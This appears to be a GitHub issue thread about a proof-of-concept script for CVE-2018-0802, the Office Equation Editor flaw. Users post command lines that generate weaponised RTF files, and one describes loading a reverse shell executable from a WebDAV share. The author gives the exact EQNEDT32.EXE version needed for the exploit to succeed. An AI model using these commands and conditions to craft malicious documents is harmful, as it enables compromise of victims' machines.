WebDAV Path format

[securitaydude]

Can you explain how the WebDAV path should be supplied to the script?

I enter python cve-2018-0802_poc.py -e \\192.xxx.xxx.xxx\webdav\executable.exe -o file.rtf

to create the .rtf file. After typing in the address of the WebDAV location in victim machine, the .rft file is called from the attacking machine but nothing happens. I can safely assume that the executable option allows me to use an executable of my choice. In this case I created a reverse shell payload and had a listener waiting for a connection on my machine.

[y11en]

i think, this REP is't 0802.

[putuoka]

i have tried with python cve-2018-0802_poc.py -e calc -o testfile.doc but didn't working

[zldww2011]

This poc is modified from cve-2017-11882's. And so far, it only test start local or embed program.The output file's format should be .rtf. Hope you guys develope new ways to exploit this vulnerability.

[moaeddy]

your POC isn't working either. did you know this?

[zldww2011]

I have tested it on win10 Enterprise Edition successfully. First you should have installed the cve-2017-11882's patch.After that, you will find a EQNEDT32.EXE file that size is 552,680 bytes in "C:\Program Files\Common Files\microsoft shared\EQUATION\" directory.Then you can successfully exploit this vulnerable. If you have installed the latest patch, there will be no that .EXE file. Then it won't work.